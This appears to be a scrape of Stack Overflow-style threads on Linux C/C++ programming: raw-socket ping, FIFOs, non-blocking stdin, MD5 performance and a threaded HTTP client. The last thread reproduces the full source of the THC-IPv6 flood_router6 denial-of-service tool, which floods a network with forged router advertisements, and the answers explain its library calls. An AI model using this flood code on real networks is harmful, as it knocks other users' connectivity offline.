I have to call ping from c++ code.I'd like to easily read the output for further utilizations.
I have come up with two solutions:
use a fork and a pipe, redirect ping output to the pipe and then parse it
find a library suited for the purpose to use a ping(ip_addresss) function directly
I'd like the latter but i didn't find anything that was clearly a standard solution.
How would you do it ?
From the educational point of view invoking an external binary is very inadvisable. Especially for a simple task such as sending an ICMP echo request, you should learn a bit of socket.
#include <fcntl.h>
#include <errno.h>
#include <sys/socket.h>
#include <resolv.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip_icmp.h>
#define PACKETSIZE 64
struct packet
{
struct icmphdr hdr;
char msg[PACKETSIZE-sizeof(struct icmphdr)];
};
int pid=-1;
struct protoent *proto=NULL;
int cnt=1;
/*--------------------------------------------------------------------*/
/*--- checksum - standard 1s complement checksum ---*/
/*--------------------------------------------------------------------*/
unsigned short checksum(void *b, int len)
{
unsigned short *buf = b;
unsigned int sum=0;
unsigned short result;
for ( sum = 0; len > 1; len -= 2 )
sum += *buf++;
if ( len == 1 )
sum += *(unsigned char*)buf;
sum = (sum >> 16) + (sum & 0xFFFF);
sum += (sum >> 16);
result = ~sum;
return result;
}
/*--------------------------------------------------------------------*/
/*--- ping - Create message and send it. ---*/
/* return 0 is ping Ok, return 1 is ping not OK. ---*/
/*--------------------------------------------------------------------*/
int ping(char *adress)
{
const int val=255;
int i, sd;
struct packet pckt;
struct sockaddr_in r_addr;
int loop;
struct hostent *hname;
struct sockaddr_in addr_ping,*addr;
pid = getpid();
proto = getprotobyname("ICMP");
hname = gethostbyname(adress);
bzero(&addr_ping, sizeof(addr_ping));
addr_ping.sin_family = hname->h_addrtype;
addr_ping.sin_port = 0;
addr_ping.sin_addr.s_addr = *(long*)hname->h_addr;
addr = &addr_ping;
sd = socket(PF_INET, SOCK_RAW, proto->p_proto);
if ( sd < 0 )
{
perror("socket");
return 1;
}
if ( setsockopt(sd, SOL_IP, IP_TTL, &val, sizeof(val)) != 0)
{
perror("Set TTL option");
return 1;
}
if ( fcntl(sd, F_SETFL, O_NONBLOCK) != 0 )
{
perror("Request nonblocking I/O");
return 1;
}
for (loop=0;loop < 10; loop++)
{
int len=sizeof(r_addr);
if ( recvfrom(sd, &pckt, sizeof(pckt), 0, (struct sockaddr*)&r_addr, &len) > 0 )
{
return 0;
}
bzero(&pckt, sizeof(pckt));
pckt.hdr.type = ICMP_ECHO;
pckt.hdr.un.echo.id = pid;
for ( i = 0; i < sizeof(pckt.msg)-1; i++ )
pckt.msg[i] = i+'0';
pckt.msg[i] = 0;
pckt.hdr.un.echo.sequence = cnt++;
pckt.hdr.checksum = checksum(&pckt, sizeof(pckt));
if ( sendto(sd, &pckt, sizeof(pckt), 0, (struct sockaddr*)addr, sizeof(*addr)) <= 0 )
perror("sendto");
usleep(300000);
}
return 1;
}
/*--------------------------------------------------------------------*/
/*--- main - look up host and start ping processes. ---*/
/*--------------------------------------------------------------------*/
int main(int argc, char *argv[])
{
if (ping("www.google.com"))
printf("Ping is not OK. \n");
else
printf("Ping is OK. \n");
return 0;
}
I would go with your first option. Linux is built around the concept of having small, specialized apps which do one thing really well, communicating with pipes. Your app shouldn't include a library to implement ping, since there is already a built-in command to do it, and it works very well!
Check out BusyBox's source for 'ping' - you can use the ping4 and ping6 functions. Just be mindful of the GPL.
Spawning 'ping' should work too - check out popen(2) for a simpler API that also runs a shell. If it's a problem, pipe + fork + exec should work.
how about https://github.com/octo/liboping ?
#include <oping.h>
int main(){
// run ping 100times
for (uint32_t i=0; i< 100; i++){
pingobj_t * pingObj = ping_construct();
ping_host_add(pingObj, "www.gmx.de");
auto startTime = std::chrono::high_resolution_clock::now();
auto ret = ping_send(pingObj);
auto endTime = std::chrono::high_resolution_clock::now();
if (ret > 0){
auto duration = (double)std::chrono::duration_cast<std::chrono::microseconds>(endTime - startTime).count()/1000.0;
std::cout << "success -- ping in " << duration << "ms" << std::endl;
} else {
std::cout << "failed" << std::endl;
}
ping_destroy(pingObj);
// wait 1sec
std::this_thread::sleep_for(std::chrono::milliseconds (1000));
}
}
liboping should be present in most linux systems
install liboping-dev (ex: sudo apt install liboping-dev)
linking against liboping
I've managed to do like this:
I use popen which basically creates a pipe, fork and exec
Then, if I need, i can wait with pclose.
Related
I am trying to develop a little application in C++, within a Linux environment, which does the following:
1) gets a data stream (a series of arrays of doubles) from the output of a 'black-box' and writes it to a pipe. The black-box can be thought as an ADC;
2) reads the data stream from the pipe and feeds it to another application which requires these data as stdin;
Unfortunately, I was not able to find tutorials or examples. The best way I found to realize this is summarized in the following test-bench example:
#include <iostream>
#include <fcntl.h>
#include <sys/stat.h>
#include <stdio.h>
#define FIFO "/tmp/data"
using namespace std;
int main() {
int fd;
int res = mkfifo(FIFO,0777);
float *writer = new float[10];
float *buffer = new float[10];
if( res == 0 ) {
cout<<"FIFO created"<<endl;
int fres = fork();
if( fres == -1 ) {
// throw an error
}
if( fres == 0 )
{
fd = open(FIFO, O_WRONLY);
int idx = 1;
while( idx <= 10) {
for(int i=0; i<10; i++) writer[i]=1*idx;
write(fd, writer, sizeof(writer)*10);
}
close(fd);
}
else
{
fd = open(FIFO, O_RDONLY);
while(1) {
read(fd, buffer, sizeof(buffer)*10);
for(int i=0; i<10; i++) printf("buf: %f",buffer[i]);
cout<<"\n"<<endl;
}
close(fd);
}
}
delete[] writer;
delete[] buffer;
}
The problem is that, by running this example, I do not get a printout of all the 10 arrays I am feeding to the pipe, whereas I keep getting always the first array (filled by 1).
Any suggestion/correction/reference is very welcome to make it work and learn more about the behavior of pipes.
EDIT:
Sorry guys! I found a very trivial error in my code: in the while loop within the writer part, I am not incrementing the index idx......once I correct it, I get the printout of all the arrays.
But now I am facing another problem: when using a lot of large arrays, these are randomly printed out (the whole sequence is not printed); as if the reader part is not able to cope with the speed of the writer. Here is the new sample code:
#include <iostream>
#include <fcntl.h>
#include <sys/stat.h>
#include <stdio.h>
#define FIFO "/tmp/data"
using namespace std;
int main(int argc, char** argv) {
int fd;
int res = mkfifo(FIFO,0777);
int N(1000);
float writer[N];
float buffer[N];
if( res == 0 ) {
cout<<"FIFO created"<<endl;
int fres = fork();
if( fres == -1 ) {
// throw an error
}
if( fres == 0 )
{
fd = open(FIFO, O_WRONLY | O_NONBLOCK);
int idx = 1;
while( idx <= 1000 ) {
for(int i=0; i<N; i++) writer[i]=1*idx;
write(fd, &writer, sizeof(float)*N);
idx++;
}
close(fd);
unlink(FIFO);
}
else
{
fd = open(FIFO, O_RDONLY);
while(1) {
int res = read(fd, &buffer, sizeof(float)*N);
if( res == 0 ) break;
for(int i=0; i<N; i++) printf(" buf: %f",buffer[i]);
cout<<"\n"<<endl;
}
close(fd);
}
}
}
Is there some mechanism to implement in order to make the write() wait until read() is still reading data from the fifo, or am I missing something trivial also in this case?
Thank you for those who have already given answers to the previous version of my question, I have implemented the suggestions.
The arguments to read and write are incorrect. Correct ones:
write(fd, writer, 10 * sizeof *writer);
read(fd, buffer, 10 * sizeof *buffer);
Also, these functions may do partial reads/writes, so that the code needs to check the return values to determine whether the operation must be continued.
Not sure why while( idx <= 10) loop in the writer, this loop never ends. Even on a 5GHz CPU. Same comment for the reader.
Is it possible to use getline(cin,buffer); at the top of my program, then have a "animated menu" still running below it?
For example (very basic):
#include <iostream>
#include <string>
using namespace std;
int stringLen=0;
string buffer;
getline(cin, buffer);
for (int i = 0; i < kMaxWait;i++)
{
printf("counter waiting for user input %d",i);
if (1 >= buffer.length())
break;
}
Would I have to fork that loop somehow so it would keep counting and display the counter until the user enters something??
One possible answer, given in the comments, is to use threads. But it's not necessary, there's a way to do this without threads.
Make stdin a non-blocking file descriptor.
Wait for stdin to become readable, via poll()/select(), in the meantime do your animation, etc...
Make stdin a blocking file descriptor, again.
Use std::getline().
There are also some ancillary issues to consider, such as the buffering that comes from std::streambuf, so before doing all that, check if there's already something to read from std::cin, first.
This is something I used sometime ago. It's quite rudimentary, but you can get the gist of the process - using poll. It returns true if there is input, and puts it in str, false otherwise. So, you can put this in your loop somewhere, and take action when there is input.
bool polled_input(std::string& str)
{
struct pollfd fd_user_in;
fd_user_in.fd = STDIN_FILENO;
fd_user_in.events = POLLIN;
fd_user_in.revents = 0;
int rv = poll(&fd_user_in, 1, 0);
if (rv == -1) {/* error */}
else if (rv == 0) return false;
else if (fd_user_in.revents & POLLIN)
{
char buffer[MAX_BUFF_SIZE];
int rc = read(STDIN_FILENO, buffer, MAX_BUFF_SIZE-1);
if (rc >= 0)
{
buffer[rc]='\0';
str = std::string(buffer);
return true;
}
else {/* error */}
}
else {/* error */}
}
select is meant for this, multiplexed, blocking I/O. It can be done without a poll I think:
#include <iostream>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **arg)
{
const int time_in_secs = 10;
const int buffer_size = 1024;
fd_set readfds;
FD_ZERO(&readfds);
FD_SET(STDIN_FILENO, &readfds);
struct timeval tv;
tv.tv_sec = time_in_secs;
tv.tv_usec = 0;
int ret = select(STDIN_FILENO + 1, &readfds, NULL, NULL, &tv);
if (!ret)
{
std::cout << "Timeout\n";
exit(1);
}
char buf[buffer_size];
if (FD_ISSET(STDIN_FILENO, &readfds))
{
int len = read(STDIN_FILENO, buf, buffer_size);
buf[len] = '\0';
}
std::cout << "You typed: " << buf << "\n";
return 0;
}
I've been studying hashing in C/C++ and tried to replicate the md5sum command in Linux. After analysing the source code, it seems that md5sum relies on the md5 library's md5_stream. I've approximated the md5_stream function from the md5.h library into the code below, and it runs in ~13-14 seconds. I've tried to call the md5_stream function directly and got ~13-14 seconds. The md5sum runs in 4 seconds. What have the GNU people done to get the speed out of the code?
The md5.h/md5.c code is available in the CoreUtils source code.
#include <QtCore/QCoreApplication>
#include <QtCore/QDebug>
#include <iostream>
#include <iomanip>
#include <fstream>
#include "md5.h"
#define BLOCKSIZE 32784
int main()
{
FILE *fpinput, *fpoutput;
if ((fpinput = fopen("/dev/sdb", "rb")) == 0) {
throw std::runtime_error("input file doesn't exist");
}
struct md5_ctx ctx;
size_t sum;
char *buffer = (char*)malloc (BLOCKSIZE + 72);
unsigned char *resblock = (unsigned char*)malloc (16);
if (!buffer)
return 1;
md5_init_ctx (&ctx);
size_t n;
sum = 0;
while (!ferror(fpinput) && !feof(fpinput)) {
n = fread (buffer + sum, 1, BLOCKSIZE - sum, fpinput);
if (n == 0){
break;
}
sum += n;
if (sum == BLOCKSIZE) {
md5_process_block (buffer, BLOCKSIZE, &ctx);
sum = 0;
}
}
if (n == 0 && ferror (fpinput)) {
free (buffer);
return 1;
}
/* Process any remaining bytes. */
if (sum > 0){
md5_process_bytes (buffer, sum, &ctx);
}
/* Construct result in desired memory. */
md5_finish_ctx (&ctx, resblock);
free (buffer);
for (int x = 0; x < 16; ++x){
std::cout << std::setfill('0') << std::setw(2) << std::hex << static_cast<uint16_t>(resblock[x]);
std::cout << " ";
}
std::cout << std::endl;
free(resblock);
return 0;
}
EDIT: Was a default mkspec problem in Fedora 19 64-bit.
fread() is convenient, but don't use fread() if you care about performance. fread() will copy from the OS to a libc buffer, then to your buffer. This extra copying cost CPU cycles and cache.
For better performance use open() then read() to avoid the extra copy. Make sure your read() calls are multiples of the block size, but lower than your CPU cache size.
For best performance use mmap() map the disk directly to RAM.
If you try something like the below code, it should go faster.
// compile gcc mmap_md5.c -lgcrypt
#include <sys/mman.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <gcrypt.h>
#include <linux/fs.h> // ioctl
#define handle_error(msg) \
do { perror(msg); exit(EXIT_FAILURE); } while (0)
int main(int argc, char *argv[])
{
char *addr;
int fd;
struct stat sb;
off_t offset, pa_offset;
size_t length;
ssize_t s;
unsigned char digest[16];
char digest_ascii[32+1] = {0,};
int digest_length = gcry_md_get_algo_dlen (GCRY_MD_MD5);
int i;
if (argc < 3 || argc > 4) {
fprintf(stderr, "%s file offset [length]\n", argv[0]);
exit(EXIT_FAILURE);
}
fd = open(argv[1], O_RDONLY);
if (fd == -1)
handle_error("open");
if (fstat(fd, &sb) == -1) /* To obtain file size */
handle_error("fstat");
offset = atoi(argv[2]);
pa_offset = offset & ~(sysconf(_SC_PAGE_SIZE) - 1);
if (sb.st_mode | S_IFBLK ) {
// block device. use ioctl to find length
ioctl(fd, BLKGETSIZE64, &length);
} else {
/* offset for mmap() must be page aligned */
if (offset >= sb.st_size) {
fprintf(stderr, "offset is past end of file size=%zd, offset=%d\n", sb.st_size, (int) offset);
exit(EXIT_FAILURE);
}
if (argc == 4) {
length = atoi(argv[3]);
if (offset + length > sb.st_size)
length = sb.st_size - offset;
/* Canaqt display bytes past end of file */
} else { /* No length arg ==> display to end of file */
length = sb.st_size - offset;
}
}
printf("length= %zd\n", length);
addr = mmap(NULL, length + offset - pa_offset, PROT_READ,
MAP_PRIVATE, fd, pa_offset);
if (addr == MAP_FAILED)
handle_error("mmap");
gcry_md_hash_buffer(GCRY_MD_MD5, digest, addr + offset - pa_offset, length);
for (i=0; i < digest_length; i++) {
sprintf(digest_ascii+(i*2), "%02x", digest[i]);
}
printf("hash=%s\n", digest_ascii);
exit(EXIT_SUCCESS);
}
It turned out to be an error in the Qt mkspecs regarding an optimization flag not being set properly.
Im developing a c++ program (most like an exercise class) about a client and a server, using HTTP protocol, the user give to the client a file file name and size (bytes), then the client create n threads and each one ask for an specific number of bytes to the server, the server attend the order and the client receive the data and put all together.
My program work fine for small files (100kb - 200kb), but when I try to send large files (Mb for example) from the server all bytes are received but the final file is corrupted, every thread had its own init and end byte number and create a file named like "file_n.txt" so there isn't problem in the order of the bytes at the time of put all the bytes together, the final corrupted file have the same number of bytes than the original (all bytes were received, also I check the server logs about the bytes interval the thread is asking for) but it's hexdump is different (obviously).
Did you think fwrite function has something to do with this issue? if yes, will be cool you point me to the right direction please, Im trying hard to solve this problem, this is my client.cpp code
#include <pthread.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <iostream>
#include <string>
#include <sstream>
using namespace std;
const int MAX_HEADER_SIZE = 1000;
int threadsEnd = 0;
struct bytes
{
int initByte;
int endByte;
int bufferSize;
int id;
char * port;
char * ip;
char * image;
};
void error(const char *msg)
{
perror(msg);
exit(0);
}
void * request_bytes (void * parameters)
{
struct bytes * p = (struct bytes *) parameters;
int sockfd, portno, n;
struct sockaddr_in serv_addr;
struct hostent *server;
int totalBuffer = MAX_HEADER_SIZE + p->bufferSize + 1;
int totalBodyContent = p->bufferSize + 1;
char buffer[totalBuffer];
char bodyContent[totalBodyContent];
portno = atoi(p->port);
server = gethostbyname(p->ip);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
bcopy((char *)server->h_addr, (char *)&serv_addr.sin_addr.s_addr, server->h_length);
serv_addr.sin_port = htons(portno);
if (connect(sockfd,(struct sockaddr *) &serv_addr,sizeof(serv_addr)) < 0)
error("ERROR connecting");
ostringstream init,end;
init << p->initByte;
end << p->endByte;
string HttpRequestString = string("POST / HTTP/1.1\r\n")
+ string("Host: ") + p->ip + string("\n")
+ string("Connection: Close\n")
+ string("Content-Length: 4\n")
+ string("Content-Type: txt\n\n")
+ string("nombre=") + p->image + string("&inicio=") + init.str() + string("&fin=") + end.str() + string("\n");
const char * HttpRequest = HttpRequestString.c_str();
n = write(sockfd,(void *)HttpRequest, strlen(HttpRequest));
if (n < 0)
error("ERROR writing to socket");
bzero(buffer,(MAX_HEADER_SIZE + p->bufferSize));
int headerEndDetermined = 0, bodyEnd = 0;
int x = 1;
int bodyInit = 1;
int total_bytes = 0;
n = read(sockfd,buffer,((MAX_HEADER_SIZE + p->bufferSize) - 1));
if (n < 0)
error("ERROR reading from socket");
for(; x < strlen(buffer); x++)
if(buffer[x - 1] == '\n')
if(buffer[x] == '\n')
{
headerEndDetermined = 1;
bodyInit = x + 1;
break;
}
for(x = 0; x < p->bufferSize ; x++)
{
bodyContent[x] = buffer[bodyInit];
bodyInit++;
}
//Escritura de archivo
char filename[32];
snprintf(filename, sizeof(char) * 32, "file%i", p->id);
FILE * pFile;
pFile = fopen (filename,"wb");
if(pFile != NULL)
{
fwrite (bodyContent,1,sizeof(bodyContent) - 1,pFile);
fclose (pFile);
}
close(sockfd);
threadsEnd++;
return NULL;
}
int main (int argc, char *argv[])
{
if (argc < 5) {
fprintf(stderr,"uso %s hostname puerto image_name bytes\n", argv[0]);
exit(0);
}
int globalByte = atoi(argv[4]);
int threadRequest = 10;
int requestBytes = (globalByte / threadRequest);
int globalInitialByte = 1;
int globalEndByte = requestBytes;
int x = 0, i = 1;
int totalBytesRequested = 0;
pthread_t request[threadRequest];
for(; x < threadRequest; x++){
struct bytes request_args;
request_args.initByte = globalInitialByte;
request_args.endByte = globalEndByte;
request_args.bufferSize = requestBytes;
request_args.id = x + 1;
globalInitialByte = globalEndByte + 1;
globalEndByte = globalEndByte + requestBytes;
if(x == (threadRequest - 1))
{
if((totalBytesRequested + requestBytes) < globalByte)
{
request_args.endByte = globalByte;
request_args.bufferSize = requestBytes + (globalByte - (totalBytesRequested + requestBytes));
}
}
request_args.ip = argv[1];
request_args.port = argv[2];
request_args.image = argv[3];
pthread_create (&request[x], NULL, &request_bytes, &request_args);
pthread_join (request[x], NULL);
totalBytesRequested += requestBytes;
}
/*do
{
cout<<"Threads completos: "<<threadsEnd<<endl;
}while(threadsEnd < threadRequest);*/
string createFileString = string("cat ");
for(; i <= threadRequest; i++)
{
ostringstream filen;
filen << i;
createFileString = createFileString + string("file") + filen.str() + string(" ");
}
createFileString = createFileString + string("> new_") + argv[3];
system(createFileString.c_str());
return 0;
}
Sorry about my bad grammar :p.
You have lots of bugs.
The HTTP protocol specifies that lines must end with "\r\n", not "\n".
You specify a content length of four bytes, but your content is longer than that.
Don't use sizeof or strlen when your code already knows the sizes of things. It will get you into trouble.
You only call read once. You need to keep calling read until you receive all the data.
You specify HTTP 1.1 compliance, but your code doesn't actually comply with the HTTP 1.1 specification. For example, your code would break horribly if you received data with chunked encoding. HTTP 1.1 clients are required to support chunked encoding. "All HTTP/1.1 applications MUST be able to receive and decode the chunked transfer-coding[.]" -- RFC2616 3.6.1.
I don't think you can declare character string sizes at run time, you will need to change
char buffer[totalBuffer];
char bodyContent[totalBodyContent];
to
char buffer = new char[totalBuffer];
char bodyContent = new char[totalBodyContent];
and delete the buffers at the end
delete [] buffer;
delete [] bodyContent;
Alternatively, you could use malloc() and free() to allocate and free the buffers.
This code is a Denial of Service attack program in BackTrack from http://www.thc.org/
The code's name is flood_router6.c
In the code shown below, I have problem what are these functions doing:
thc_create_ipv6()
thc_add_icmp6()
thc_generate_and_send_pkt()
there are no functions like that in "thc-ipv6.h" library.
What are these functions do? I searched on google and there are no answer.
Anyone can help?
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <time.h>
#include <pcap.h>
#include "thc-ipv6.h"
extern int debug;
void help(char *prg) {
printf("%s %s (c) 2010 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
printf("Syntax: %s [-r] interface\n\n", prg);
printf("Flood the local network with router advertisements.\n");
printf("Use -r to use raw mode.\n\n");
exit(-1);
}
int main(int argc, char *argv[]) {
char *interface, mac[6] = "";
unsigned char *routerip6, *route6, *mac6 = mac, *ip6;
unsigned char buf[56];
unsigned char *dst = thc_resolve6("FF02::1"), *dstmac = thc_get_multicast_mac(dst);
int size, mtu, i;
unsigned char *pkt = NULL;
int pkt_len = 0;
int rawmode = 0;
int count = 0;
if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
srand(time(NULL) + getpid());
setvbuf(stdout, NULL, _IONBF, 0);
interface = argv[1];
mtu = 1500;
size = 64;
ip6 = malloc(16);
routerip6 = malloc(16);
route6 = malloc(16);
mac[0] = 0x00;
mac[1] = 0x18;
memset(ip6, 0, 16);
ip6[0] = 0xfe;
ip6[1] = 0x80;
ip6[8] = 0x02;
ip6[9] = mac[1];
ip6[11] = 0xff;
ip6[12] = 0xfe;
routerip6[0] = 0x2a;
routerip6[1] = 0x01;
routerip6[15] = 0x01;
memset(route6 + 8, 0, 8);
printf("Starting to flood network with router advertisements on %s
(Press Control-C to end, a dot is printed for every 100 packet):\n", interface);
while (1) {
for (i = 2; i < 6; i++)
mac[i] = rand() % 256;
for (i = 2; i < 8; i++)
routerip6[i] = rand() % 256;
// ip6[9] = mac[1];
ip6[10] = mac[2];
ip6[13] = mac[3];
ip6[14] = mac[4];
ip6[15] = mac[5];
memcpy(route6, routerip6, 8);
count++;
memset(buf, 0, sizeof(buf));
buf[1] = 250;
buf[5] = 30;
buf[8] = 5;
buf[9] = 1;
buf[12] = mtu / 16777216;
buf[13] = (mtu % 16777216) / 65536;
buf[14] = (mtu % 65536) / 256;
buf[15] = mtu % 256;
buf[16] = 3;
buf[17] = 4;
buf[18] = size;
buf[19] = 128 + 64 + 32;
memset(&buf[20], 255, 8);
memcpy(&buf[32], route6, 16);
buf[48] = 1;
buf[49] = 1;
memcpy(&buf[50], mac6, 6);
if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff08ffff, buf, sizeof(buf), 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
perror("");
return -1;
}
pkt = thc_destroy_packet(pkt);
usleep(1);
if (count % 100 == 0)
printf(".");
}
return 0;
}
THC-IPv6 is a set of tools used to attack inherent protocol weaknesses of IPV6.The project is a part of the THC, namely The Hacker's Choice. You can find the detail about this project:
http://www.thc.org/thc-ipv6/
The THC-IPv6 not only provides tools for attacking but also a handy library.The library can be used in developing your own applications, e.g. create a specific IPv6 packet.
http://www.thc.org/thc-ipv6/README
Basicly, thc_create_ipv6() is used to create a IPv6 packet with no extension headers.
thc_add_icmp6() will add the icmpv6 header to this packet and thc_generate_and_send_pkt() will send out this packet to wire. More detail about THC-IPv6 library pls refer to the README.
You did not really look - the functions are defined in thc-ipv6.h, the code for them is in thc-ipv6-lib.c
The function thc_create_ipv6() creates the basic IPv6 packet and is required before any other packet function of the library.
Then the_add_icmp6() adds an ICMPv6 header to the IPv6 packet.
There are more thc_add_* functions, e.g. for UDP, TCP or extension headers.
Finally thc_generate_and_send_pkt() will build the packet and send it to the network.
See the README.
The smurf6.c file is an easy example on how to use the library.